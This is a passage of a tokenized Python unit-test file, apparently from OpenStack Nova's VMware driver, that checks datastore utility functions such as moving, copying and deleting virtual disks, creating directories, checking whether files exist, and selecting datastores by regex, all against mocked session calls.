string|"'MoveDatastoreFile_Task'"
op|','
name|'method'
op|')'
newline|'\n'
name|'sourceName'
op|'='
name|'kwargs'
op|'.'
name|'get'
op|'('
string|"'sourceName'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'[ds] tmp/src'"
op|','
name|'sourceName'
op|')'
newline|'\n'
name|'destinationName'
op|'='
name|'kwargs'
op|'.'
name|'get'
op|'('
string|"'destinationName'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'[ds] base/dst'"
op|','
name|'destinationName'
op|')'
newline|'\n'
name|'sourceDatacenter'
op|'='
name|'kwargs'
op|'.'
name|'get'
op|'('
string|"'sourceDatacenter'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'fake-dc-ref'"
op|','
name|'sourceDatacenter'
op|')'
newline|'\n'
name|'destinationDatacenter'
op|'='
name|'kwargs'
op|'.'
name|'get'
op|'('
string|"'destinationDatacenter'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'fake-dc-ref'"
op|','
name|'destinationDatacenter'
op|')'
newline|'\n'
name|'return'
string|"'fake_move_task'"
newline|'\n'
nl|'\n'
dedent|''
name|'with'
name|'test'
op|'.'
name|'nested'
op|'('
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'_wait_for_task'"
op|')'
op|','
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'_call_method'"
op|','
nl|'\n'
name|'fake_call_method'
op|')'
nl|'\n'
op|')'
name|'as'
op|'('
name|'_wait_for_task'
op|','
name|'_call_method'
op|')'
op|':'
newline|'\n'
indent|' '
name|'src_ds_path'
op|'='
name|'ds_obj'
op|'.'
name|'DatastorePath'
op|'('
string|"'ds'"
op|','
string|"'tmp/src'"
op|')'
newline|'\n'
name|'dst_ds_path'
op|'='
name|'ds_obj'
op|'.'
name|'DatastorePath'
op|'('
string|"'ds'"
op|','
string|"'base/dst'"
op|')'
newline|'\n'
name|'ds_util'
op|'.'
name|'file_move'
op|'('
name|'self'
op|'.'
name|'session'
op|','
nl|'\n'
string|"'fake-dc-ref'"
op|','
name|'src_ds_path'
op|','
name|'dst_ds_path'
op|')'
newline|'\n'
name|'_wait_for_task'
op|'.'
name|'assert_has_calls'
op|'('
op|'['
nl|'\n'
name|'mock'
op|'.'
name|'call'
op|'('
string|"'fake_move_task'"
op|')'
op|']'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_disk_move
dedent|''
dedent|''
name|'def'
name|'test_disk_move'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
DECL|function|fake_call_method
indent|' '
name|'def'
name|'fake_call_method'
op|'('
name|'module'
op|','
name|'method'
op|','
op|'*'
name|'args'
op|','
op|'**'
name|'kwargs'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'MoveVirtualDisk_Task'"
op|','
name|'method'
op|')'
newline|'\n'
name|'src_name'
op|'='
name|'kwargs'
op|'.'
name|'get'
op|'('
string|"'sourceName'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'[ds] tmp/src'"
op|','
name|'src_name'
op|')'
newline|'\n'
name|'dest_name'
op|'='
name|'kwargs'
op|'.'
name|'get'
op|'('
string|"'destName'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'[ds] base/dst'"
op|','
name|'dest_name'
op|')'
newline|'\n'
name|'src_datacenter'
op|'='
name|'kwargs'
op|'.'
name|'get'
op|'('
string|"'sourceDatacenter'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'fake-dc-ref'"
op|','
name|'src_datacenter'
op|')'
newline|'\n'
name|'dest_datacenter'
op|'='
name|'kwargs'
op|'.'
name|'get'
op|'('
string|"'destDatacenter'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'fake-dc-ref'"
op|','
name|'dest_datacenter'
op|')'
newline|'\n'
name|'return'
string|"'fake_move_task'"
newline|'\n'
nl|'\n'
dedent|''
name|'with'
name|'test'
op|'.'
name|'nested'
op|'('
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'_wait_for_task'"
op|')'
op|','
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'_call_method'"
op|','
nl|'\n'
name|'fake_call_method'
op|')'
nl|'\n'
op|')'
name|'as'
op|'('
name|'_wait_for_task'
op|','
name|'_call_method'
op|')'
op|':'
newline|'\n'
indent|' '
name|'ds_util'
op|'.'
name|'disk_move'
op|'('
name|'self'
op|'.'
name|'session'
op|','
nl|'\n'
string|"'fake-dc-ref'"
op|','
string|"'[ds] tmp/src'"
op|','
string|"'[ds] base/dst'"
op|')'
newline|'\n'
name|'_wait_for_task'
op|'.'
name|'assert_has_calls'
op|'('
op|'['
nl|'\n'
name|'mock'
op|'.'
name|'call'
op|'('
string|"'fake_move_task'"
op|')'
op|']'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_disk_copy
dedent|''
dedent|''
name|'def'
name|'test_disk_copy'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'with'
name|'test'
op|'.'
name|'nested'
op|'('
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'_wait_for_task'"
op|')'
op|','
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'_call_method'"
op|','
nl|'\n'
name|'return_value'
op|'='
name|'mock'
op|'.'
name|'sentinel'
op|'.'
name|'cm'
op|')'
nl|'\n'
op|')'
name|'as'
op|'('
name|'_wait_for_task'
op|','
name|'_call_method'
op|')'
op|':'
newline|'\n'
indent|' '
name|'ds_util'
op|'.'
name|'disk_copy'
op|'('
name|'self'
op|'.'
name|'session'
op|','
name|'mock'
op|'.'
name|'sentinel'
op|'.'
name|'dc_ref'
op|','
nl|'\n'
name|'mock'
op|'.'
name|'sentinel'
op|'.'
name|'source_ds'
op|','
name|'mock'
op|'.'
name|'sentinel'
op|'.'
name|'dest_ds'
op|')'
newline|'\n'
name|'_wait_for_task'
op|'.'
name|'assert_called_once_with'
op|'('
name|'mock'
op|'.'
name|'sentinel'
op|'.'
name|'cm'
op|')'
newline|'\n'
name|'_call_method'
op|'.'
name|'assert_called_once_with'
op|'('
nl|'\n'
name|'mock'
op|'.'
name|'ANY'
op|','
string|"'CopyVirtualDisk_Task'"
op|','
string|"'VirtualDiskManager'"
op|','
nl|'\n'
name|'sourceName'
op|'='
string|"'sentinel.source_ds'"
op|','
nl|'\n'
name|'destDatacenter'
op|'='
name|'mock'
op|'.'
name|'sentinel'
op|'.'
name|'dc_ref'
op|','
nl|'\n'
name|'sourceDatacenter'
op|'='
name|'mock'
op|'.'
name|'sentinel'
op|'.'
name|'dc_ref'
op|','
name|'force'
op|'='
name|'False'
op|','
nl|'\n'
name|'destName'
op|'='
string|"'sentinel.dest_ds'"
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_disk_delete
dedent|''
dedent|''
name|'def'
name|'test_disk_delete'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'with'
name|'test'
op|'.'
name|'nested'
op|'('
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'_wait_for_task'"
op|')'
op|','
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'_call_method'"
op|','
nl|'\n'
name|'return_value'
op|'='
name|'mock'
op|'.'
name|'sentinel'
op|'.'
name|'cm'
op|')'
nl|'\n'
op|')'
name|'as'
op|'('
name|'_wait_for_task'
op|','
name|'_call_method'
op|')'
op|':'
newline|'\n'
indent|' '
name|'ds_util'
op|'.'
name|'disk_delete'
op|'('
name|'self'
op|'.'
name|'session'
op|','
nl|'\n'
string|"'fake-dc-ref'"
op|','
string|"'[ds] tmp/disk.vmdk'"
op|')'
newline|'\n'
name|'_wait_for_task'
op|'.'
name|'assert_called_once_with'
op|'('
name|'mock'
op|'.'
name|'sentinel'
op|'.'
name|'cm'
op|')'
newline|'\n'
name|'_call_method'
op|'.'
name|'assert_called_once_with'
op|'('
nl|'\n'
name|'mock'
op|'.'
name|'ANY'
op|','
string|"'DeleteVirtualDisk_Task'"
op|','
string|"'VirtualDiskManager'"
op|','
nl|'\n'
name|'datacenter'
op|'='
string|"'fake-dc-ref'"
op|','
name|'name'
op|'='
string|"'[ds] tmp/disk.vmdk'"
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_mkdir
dedent|''
dedent|''
name|'def'
name|'test_mkdir'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
DECL|function|fake_call_method
indent|' '
name|'def'
name|'fake_call_method'
op|'('
name|'module'
op|','
name|'method'
op|','
op|'*'
name|'args'
op|','
op|'**'
name|'kwargs'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'MakeDirectory'"
op|','
name|'method'
op|')'
newline|'\n'
name|'name'
op|'='
name|'kwargs'
op|'.'
name|'get'
op|'('
string|"'name'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'[ds] fake/path'"
op|','
name|'name'
op|')'
newline|'\n'
name|'datacenter'
op|'='
name|'kwargs'
op|'.'
name|'get'
op|'('
string|"'datacenter'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'fake-dc-ref'"
op|','
name|'datacenter'
op|')'
newline|'\n'
name|'createParentDirectories'
op|'='
name|'kwargs'
op|'.'
name|'get'
op|'('
string|"'createParentDirectories'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertTrue'
op|'('
name|'createParentDirectories'
op|')'
newline|'\n'
nl|'\n'
dedent|''
name|'with'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'_call_method'"
op|','
nl|'\n'
name|'fake_call_method'
op|')'
op|':'
newline|'\n'
indent|' '
name|'ds_path'
op|'='
name|'ds_obj'
op|'.'
name|'DatastorePath'
op|'('
string|"'ds'"
op|','
string|"'fake/path'"
op|')'
newline|'\n'
name|'ds_util'
op|'.'
name|'mkdir'
op|'('
name|'self'
op|'.'
name|'session'
op|','
name|'ds_path'
op|','
string|"'fake-dc-ref'"
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_file_exists
dedent|''
dedent|''
name|'def'
name|'test_file_exists'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
DECL|function|fake_call_method
indent|' '
name|'def'
name|'fake_call_method'
op|'('
name|'module'
op|','
name|'method'
op|','
op|'*'
name|'args'
op|','
op|'**'
name|'kwargs'
op|')'
op|':'
newline|'\n'
indent|' '
name|'if'
name|'method'
op|'=='
string|"'SearchDatastore_Task'"
op|':'
newline|'\n'
indent|' '
name|'ds_browser'
op|'='
name|'args'
op|'['
number|'0'
op|']'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'fake-browser'"
op|','
name|'ds_browser'
op|')'
newline|'\n'
name|'datastorePath'
op|'='
name|'kwargs'
op|'.'
name|'get'
op|'('
string|"'datastorePath'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'[ds] fake/path'"
op|','
name|'datastorePath'
op|')'
newline|'\n'
name|'return'
string|"'fake_exists_task'"
newline|'\n'
nl|'\n'
comment|'# Should never get here'
nl|'\n'
dedent|''
name|'self'
op|'.'
name|'fail'
op|'('
op|')'
newline|'\n'
nl|'\n'
DECL|function|fake_wait_for_task
dedent|''
name|'def'
name|'fake_wait_for_task'
op|'('
name|'task_ref'
op|')'
op|':'
newline|'\n'
indent|' '
name|'if'
name|'task_ref'
op|'=='
string|"'fake_exists_task'"
op|':'
newline|'\n'
indent|' '
name|'result_file'
op|'='
name|'fake'
op|'.'
name|'DataObject'
op|'('
op|')'
newline|'\n'
name|'result_file'
op|'.'
name|'path'
op|'='
string|"'fake-file'"
newline|'\n'
nl|'\n'
name|'result'
op|'='
name|'fake'
op|'.'
name|'DataObject'
op|'('
op|')'
newline|'\n'
name|'result'
op|'.'
name|'file'
op|'='
op|'['
name|'result_file'
op|']'
newline|'\n'
name|'result'
op|'.'
name|'path'
op|'='
string|"'[ds] fake/path'"
newline|'\n'
nl|'\n'
name|'task_info'
op|'='
name|'fake'
op|'.'
name|'DataObject'
op|'('
op|')'
newline|'\n'
name|'task_info'
op|'.'
name|'result'
op|'='
name|'result'
newline|'\n'
nl|'\n'
name|'return'
name|'task_info'
newline|'\n'
nl|'\n'
comment|'# Should never get here'
nl|'\n'
dedent|''
name|'self'
op|'.'
name|'fail'
op|'('
op|')'
newline|'\n'
nl|'\n'
dedent|''
name|'with'
name|'test'
op|'.'
name|'nested'
op|'('
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'_call_method'"
op|','
nl|'\n'
name|'fake_call_method'
op|')'
op|','
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'_wait_for_task'"
op|','
nl|'\n'
name|'fake_wait_for_task'
op|')'
op|')'
op|':'
newline|'\n'
indent|' '
name|'ds_path'
op|'='
name|'ds_obj'
op|'.'
name|'DatastorePath'
op|'('
string|"'ds'"
op|','
string|"'fake/path'"
op|')'
newline|'\n'
name|'file_exists'
op|'='
name|'ds_util'
op|'.'
name|'file_exists'
op|'('
name|'self'
op|'.'
name|'session'
op|','
nl|'\n'
string|"'fake-browser'"
op|','
name|'ds_path'
op|','
string|"'fake-file'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertTrue'
op|'('
name|'file_exists'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_file_exists_fails
dedent|''
dedent|''
name|'def'
name|'test_file_exists_fails'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
DECL|function|fake_call_method
indent|' '
name|'def'
name|'fake_call_method'
op|'('
name|'module'
op|','
name|'method'
op|','
op|'*'
name|'args'
op|','
op|'**'
name|'kwargs'
op|')'
op|':'
newline|'\n'
indent|' '
name|'if'
name|'method'
op|'=='
string|"'SearchDatastore_Task'"
op|':'
newline|'\n'
indent|' '
name|'return'
string|"'fake_exists_task'"
newline|'\n'
nl|'\n'
comment|'# Should never get here'
nl|'\n'
dedent|''
name|'self'
op|'.'
name|'fail'
op|'('
op|')'
newline|'\n'
nl|'\n'
DECL|function|fake_wait_for_task
dedent|''
name|'def'
name|'fake_wait_for_task'
op|'('
name|'task_ref'
op|')'
op|':'
newline|'\n'
indent|' '
name|'if'
name|'task_ref'
op|'=='
string|"'fake_exists_task'"
op|':'
newline|'\n'
indent|' '
name|'raise'
name|'vexc'
op|'.'
name|'FileNotFoundException'
op|'('
op|')'
newline|'\n'
nl|'\n'
comment|'# Should never get here'
nl|'\n'
dedent|''
name|'self'
op|'.'
name|'fail'
op|'('
op|')'
newline|'\n'
nl|'\n'
dedent|''
name|'with'
name|'test'
op|'.'
name|'nested'
op|'('
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'_call_method'"
op|','
nl|'\n'
name|'fake_call_method'
op|')'
op|','
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'_wait_for_task'"
op|','
nl|'\n'
name|'fake_wait_for_task'
op|')'
op|')'
op|':'
newline|'\n'
indent|' '
name|'ds_path'
op|'='
name|'ds_obj'
op|'.'
name|'DatastorePath'
op|'('
string|"'ds'"
op|','
string|"'fake/path'"
op|')'
newline|'\n'
name|'file_exists'
op|'='
name|'ds_util'
op|'.'
name|'file_exists'
op|'('
name|'self'
op|'.'
name|'session'
op|','
nl|'\n'
string|"'fake-browser'"
op|','
name|'ds_path'
op|','
string|"'fake-file'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertFalse'
op|'('
name|'file_exists'
op|')'
newline|'\n'
nl|'\n'
DECL|member|_mock_get_datastore_calls
dedent|''
dedent|''
name|'def'
name|'_mock_get_datastore_calls'
op|'('
name|'self'
op|','
op|'*'
name|'datastores'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Mock vim_util calls made by get_datastore."""'
newline|'\n'
nl|'\n'
name|'datastores_i'
op|'='
op|'['
name|'None'
op|']'
newline|'\n'
nl|'\n'
comment|'# For the moment, at least, this list of datastores is simply passed to'
nl|'\n'
comment|'# get_properties_for_a_collection_of_objects, which we mock below. We'
nl|'\n'
comment|"# don't need to over-complicate the fake function by worrying about its"
nl|'\n'
comment|'# contents.'
nl|'\n'
name|'fake_ds_list'
op|'='
op|'['
string|"'fake-ds'"
op|']'
newline|'\n'
nl|'\n'
DECL|function|fake_call_method
name|'def'
name|'fake_call_method'
op|'('
name|'module'
op|','
name|'method'
op|','
op|'*'
name|'args'
op|','
op|'**'
name|'kwargs'
op|')'
op|':'
newline|'\n'
comment|'# Mock the call which returns a list of datastores for the cluster'
nl|'\n'
indent|' '
name|'if'
op|'('
name|'module'
op|'=='
name|'ds_util'
op|'.'
name|'vutil'
name|'and'
nl|'\n'
name|'method'
op|'=='
string|"'get_object_property'"
name|'and'
nl|'\n'
name|'args'
op|'=='
op|'('
string|"'fake-cluster'"
op|','
string|"'datastore'"
op|')'
op|')'
op|':'
newline|'\n'
indent|' '
name|'fake_ds_mor'
op|'='
name|'fake'
op|'.'
name|'DataObject'
op|'('
op|')'
newline|'\n'
name|'fake_ds_mor'
op|'.'
name|'ManagedObjectReference'
op|'='
name|'fake_ds_list'
newline|'\n'
name|'return'
name|'fake_ds_mor'
newline|'\n'
nl|'\n'
comment|'# Return the datastore result sets we were passed in, in the order'
nl|'\n'
comment|'# given'
nl|'\n'
dedent|''
name|'if'
op|'('
name|'module'
op|'=='
name|'ds_util'
op|'.'
name|'vim_util'
name|'and'
nl|'\n'
name|'method'
op|'=='
string|"'get_properties_for_a_collection_of_objects'"
name|'and'
nl|'\n'
name|'args'
op|'['
number|'0'
op|']'
op|'=='
string|"'Datastore'"
name|'and'
nl|'\n'
name|'args'
op|'['
number|'1'
op|']'
op|'=='
name|'fake_ds_list'
op|')'
op|':'
newline|'\n'
comment|'# Start a new iterator over given datastores'
nl|'\n'
indent|' '
name|'datastores_i'
op|'['
number|'0'
op|']'
op|'='
name|'iter'
op|'('
name|'datastores'
op|')'
newline|'\n'
name|'return'
name|'next'
op|'('
name|'datastores_i'
op|'['
number|'0'
op|']'
op|')'
newline|'\n'
nl|'\n'
comment|'# Continue returning results from the current iterator.'
nl|'\n'
dedent|''
name|'if'
op|'('
name|'module'
op|'=='
name|'ds_util'
op|'.'
name|'vutil'
name|'and'
nl|'\n'
name|'method'
op|'=='
string|"'continue_retrieval'"
op|')'
op|':'
newline|'\n'
indent|' '
name|'try'
op|':'
newline|'\n'
indent|' '
name|'return'
name|'next'
op|'('
name|'datastores_i'
op|'['
number|'0'
op|']'
op|')'
newline|'\n'
dedent|''
name|'except'
name|'StopIteration'
op|':'
newline|'\n'
indent|' '
name|'return'
name|'None'
newline|'\n'
nl|'\n'
dedent|''
dedent|''
name|'if'
op|'('
name|'method'
op|'=='
string|"'continue_retrieval'"
name|'or'
nl|'\n'
name|'method'
op|'=='
string|"'cancel_retrieval'"
op|')'
op|':'
newline|'\n'
indent|' '
name|'return'
newline|'\n'
nl|'\n'
comment|"# Sentinel that get_datastore's use of vim has changed"
nl|'\n'
dedent|''
name|'self'
op|'.'
name|'fail'
op|'('
string|"'Unexpected vim call in get_datastore: %s'"
op|'%'
name|'method'
op|')'
newline|'\n'
nl|'\n'
dedent|''
name|'return'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'_call_method'"
op|','
nl|'\n'
name|'side_effect'
op|'='
name|'fake_call_method'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_datastore
dedent|''
name|'def'
name|'test_get_datastore'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'fake_objects'
op|'='
name|'fake'
op|'.'
name|'FakeRetrieveResult'
op|'('
op|')'
newline|'\n'
name|'fake_objects'
op|'.'
name|'add_object'
op|'('
name|'fake'
op|'.'
name|'Datastore'
op|'('
op|')'
op|')'
newline|'\n'
name|'fake_objects'
op|'.'
name|'add_object'
op|'('
name|'fake'
op|'.'
name|'Datastore'
op|'('
string|'"fake-ds-2"'
op|','
number|'2048'
op|','
number|'1000'
op|','
nl|'\n'
name|'False'
op|','
string|'"normal"'
op|')'
op|')'
newline|'\n'
name|'fake_objects'
op|'.'
name|'add_object'
op|'('
name|'fake'
op|'.'
name|'Datastore'
op|'('
string|'"fake-ds-3"'
op|','
number|'4096'
op|','
number|'2000'
op|','
nl|'\n'
name|'True'
op|','
string|'"inMaintenance"'
op|')'
op|')'
newline|'\n'
nl|'\n'
name|'with'
name|'self'
op|'.'
name|'_mock_get_datastore_calls'
op|'('
name|'fake_objects'
op|')'
op|':'
newline|'\n'
indent|' '
name|'result'
op|'='
name|'ds_util'
op|'.'
name|'get_datastore'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'fake-cluster'"
op|')'
newline|'\n'
dedent|''
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|'"fake-ds"'
op|','
name|'result'
op|'.'
name|'name'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'units'
op|'.'
name|'Ti'
op|','
name|'result'
op|'.'
name|'capacity'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'500'
op|'*'
name|'units'
op|'.'
name|'Gi'
op|','
name|'result'
op|'.'
name|'freespace'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_datastore_with_regex
dedent|''
name|'def'
name|'test_get_datastore_with_regex'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
comment|'# Test with a regex that matches with a datastore'
nl|'\n'
indent|' '
name|'datastore_valid_regex'
op|'='
name|'re'
op|'.'
name|'compile'
op|'('
string|'"^openstack.*\\d$"'
op|')'
newline|'\n'
name|'fake_objects'
op|'='
name|'fake'
op|'.'
name|'FakeRetrieveResult'
op|'('
op|')'
newline|'\n'
name|'fake_objects'
op|'.'
name|'add_object'
op|'('
name|'fake'
op|'.'
name|'Datastore'
op|'('
string|'"openstack-ds0"'
op|')'
op|')'
newline|'\n'
name|'fake_objects'
op|'.'
name|'add_object'
op|'('
name|'fake'
op|'.'
name|'Datastore'
op|'('
string|'"fake-ds0"'
op|')'
op|')'
newline|'\n'
name|'fake_objects'
op|'.'
name|'add_object'
op|'('
name|'fake'
op|'.'
name|'Datastore'
op|'('
string|'"fake-ds1"'
op|')'
op|')'
newline|'\n'
nl|'\n'
name|'with'
name|'self'
op|'.'
name|'_mock_get_datastore_calls'
op|'('
name|'fake_objects'
op|')'
op|':'
newline|'\n'
indent|' '
name|'result'
op|'='
name|'ds_util'
op|'.'
name|'get_datastore'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'fake-cluster'"
op|','
nl|'\n'
name|'datastore_valid_regex'
op|')'
newline|'\n'
dedent|''
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|'"openstack-ds0"'
op|','
name|'result'
op|'.'
name|'name'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_datastore_with_token
dedent|''
name|'def'
name|'test_get_datastore_with_token'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'regex'
op|'='
name|'re'
op|'.'
name|'compile'
op|'('
string|'"^ds.*\\d$"'
op|')'
newline|'\n'
name|'fake0'
op|'='
name|'fake'
op|'.'
name|'FakeRetrieveResult'
op|'('
op|')'
newline|'\n'
name|'fake0'
op|'.'
name|'add_object'
op|'('
name|'fake'
op|'.'
name|'Datastore'
op|'('
string|'"ds0"'
op|','
number|'10'
op|'*'
name|'units'
op|'.'
name|'Gi'
op|','
number|'5'
op|'*'
name|'units'
op|'.'
name|'Gi'
op|')'
op|')'
newline|'\n'
name|'fake0'
op|'.'
name|'add_object'
op|'('
name|'fake'
op|'.'
name|'Datastore'
op|'('
string|'"foo"'
op|','
number|'10'
op|'*'
name|'units'
op|'.'
name|'Gi'
op|','
number|'9'
op|'*'
name|'units'
op|'.'
name|'Gi'
op|')'
op|')'
newline|'\n'
name|'setattr'
op|'('
name|'fake0'
op|','
string|"'token'"
op|','
string|"'token-0'"
op|')'
newline|'\n'
name|'fake1'
op|'='
name|'fake'
op|'.'
name|'FakeRetrieveResult'
op|'('
op|')'
newline|'\n'
name|'fake1'
op|'.'
name|'add_object'
op|'('
name|'fake'
op|'.'
name|'Datastore'
op|'('
string|'"ds2"'
op|','
number|'10'
op|'*'
name|'units'
op|'.'
name|'Gi'
op|','
number|'8'
op|'*'
name|'units'
op|'.'
name|'Gi'
op|')'
op|')'
newline|'\n'
name|'fake1'
op|'.'
name|'add_object'
op|'('
name|'fake'
op|'.'
name|'Datastore'
op|'('
string|'"ds3"'
op|','
number|'10'
op|'*'
name|'units'
op|'.'
name|'Gi'
op|','
number|'1'
op|'*'
name|'units'
op|'.'
name|'Gi'
op|')'
op|')'
newline|'\n'
nl|'\n'
name|'with'
name|'self'
op|'.'
name|'_mock_get_datastore_calls'
op|'('
name|'fake0'
op|','
name|'fake1'
op|')'
op|':'
newline|'\n'
indent|' '
name|'result'
op|'='
name|'ds_util'
op|'.'
name|'get_datastore'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'fake-cluster'"
op|','
name|'regex'
op|')'
newline|'\n'
dedent|''
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|'"ds2"'
op|','
name|'result'
op|'.'
name|'name'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_datastore_with_list
dedent|''
name|'def'
name|'test_get_datastore_with_list'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
comment|'# Test with a regex containing whitelist of datastores'
nl|'\n'
indent|' '
name|'datastore_valid_regex'
op|'='
name|'re'
op|'.'
name|'compile'
op|'('
string|'"(openstack-ds0|openstack-ds2)"'
op|')'
newline|'\n'
name|'fake_objects'
op|'='
name|'fake'
op|'.'
name|'FakeRetrieveResult'
op|'('
op|')'
newline|'\n'
name|'fake_objects'
op|'.'
name|'add_object'
op|'('
name|'fake'
op|'.'
name|'Datastore'
op|'('
string|'"openstack-ds0"'
op|')'
op|')'
newline|'\n'
name|'fake_objects'
op|'.'
name|'add_object'
op|'('
name|'fake'
op|'.'
name|'Datastore'
op|'('
string|'"openstack-ds1"'
op|')'
op|')'
newline|'\n'
name|'fake_objects'
op|'.'
name|'add_object'
op|'('
name|'fake'
op|'.'
name|'Datastore'
op|'('
string|'"openstack-ds2"'
op|')'
op|')'
newline|'\n'
nl|'\n'
name|'with'
name|'self'
op|'.'
name|'_mock_get_datastore_calls'
op|'('
name|'fake_objects'
op|')'
op|':'
newline|'\n'
indent|' '
name|'result'
op|'='
name|'ds_util'
op|'.'
name|'get_datastore'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'fake-cluster'"
op|','
nl|'\n'
name|'datastore_valid_regex'
op|')'
newline|'\n'
dedent|''
name|'self'
op|'.'
name|'assertNotEqual'
op|'('
string|'"openstack-ds1"'
op|','
name|'result'
op|'.'
name|'name'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_datastore_with_regex_error
dedent|''
name|'def'
name|'test_get_datastore_with_regex_error'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
comment|'# Test with a regex that has no match'
nl|'\n'
comment|'# Checks if code raises DatastoreNotFound with a specific message'
nl|'\n'
indent|' '
name|'datastore_invalid_regex'
op|'='
name|'re'
op|'.'
name|'compile'
op|'('
string|'"unknown-ds"'
op|')'
newline|'\n'
name|'exp_message'
op|'='
op|'('
string|'"Datastore regex %s did not match any datastores"'
nl|'\n'
op|'%'
name|'datastore_invalid_regex'
op|'.'
name|'pattern'
op|')'
newline|'\n'
name|'fake_objects'
op|'='
name|'fake'
op|'.'
name|'FakeRetrieveResult'
op|'('
op|')'
newline|'\n'
name|'fake_objects'
op|'.'
name|'add_object'
op|'('
name|'fake'
op|'.'
name|'Datastore'
op|'('
string|'"fake-ds0"'
op|')'
op|')'
newline|'\n'
name|'fake_objects'
op|'.'
name|'add_object'
op|'('
name|'fake'
op|'.'
name|'Datastore'
op|'('
string|'"fake-ds1"'
op|')'
op|')'
newline|'\n'
comment|'# assertRaisesRegExp would have been a good choice instead of'
nl|'\n'
comment|"# try/catch block, but it's available only from Py 2.7."
nl|'\n'
name|'try'
op|':'
newline|'\n'
indent|' '
name|'with'
name|'self'
op|'.'
name|'_mock_get_datastore_calls'
op|'('
name|'fake_objects'
op|')'
op|':'
newline|'\n'
indent|' '
name|'ds_util'
op|'.'
name|'get_datastore'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'fake-cluster'"
op|','
nl|'\n'
name|'datastore_invalid_regex'
op|')'
newline|'\n'
dedent|''
